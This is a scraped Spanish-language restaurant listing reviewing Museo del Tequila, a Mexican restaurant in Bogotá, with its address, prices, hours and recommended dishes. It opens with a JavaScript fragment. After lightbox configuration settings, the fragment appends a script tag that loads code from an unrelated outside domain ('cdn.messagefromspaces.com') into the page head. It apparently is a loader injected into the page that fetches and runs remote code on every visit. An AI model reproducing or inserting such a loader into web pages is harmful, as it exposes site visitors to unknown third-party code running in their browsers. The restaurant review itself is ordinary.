, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Museo del Tequila

Escrito por || 26 diciembre, 2012 en Restaurante Familiar - Sin comentarios
Museo del Tequila

Dirección: Carrera 13A #86A-18
Zona:
Norte
Precio Promedio Plato por Persona: 
Entre 20.000  y 30.000 pesos
Formas de Pago:  
Recibe Todas las  Tarjetas
TELÉFONO DE RESERVAS:   744 90 97

 

Categoría:Mexicano

La excelente Calidad de la alta cocina mexicana, buen servicio y ambiente inigualable. Todo dentro de un hermoso marco mexicanisimo compuesto por Elegantes vitrinas que exhiben la Tercera colección de tequilas más grande del mundo.

Un restaurante cuyo mayor atractivo es aplicar, al pie de la letra, lo que profesa su nombre. El cliente ingresa a un verdadero espacio museístico en donde el homenajeado, dispuesto como obra de arte mestiza, no es otro que una inmensa variedad de tequilas. Un repertorio sorprendente que descresta hasta al más conocedor sobre el tema. Su decoracion me transporta a Mexico con una buena serenata de mariachis.

La carta no es la tipica carta mexicana que solo cuenta con enchiladas, tacos y quesadillas. Este grandioso restaurante brinda una variedad de pollos, pescados, sopas y también los típicos platos mexicanos.

El dueño siempre está en el local, lo cual hace que la atención y el servicio sean excelentes. La comida es excepcional. Se recomienda hacer reserva porque siempre está lleno.

Recomendados:
- Mole poblano
- Las puntas mexicanas del museo
- Los antojitos mexicanos
- Agua de horchata (Bebida)
- Agua de flor de jamaica (Bebida)

Horario:
Martes a Sábado 12:00m. a 4:00p.m. y 7:00p.m. a 12:00m.
Domingo 12:00m. a 4:30p.m.

Comedor

Bar

Deja un comentario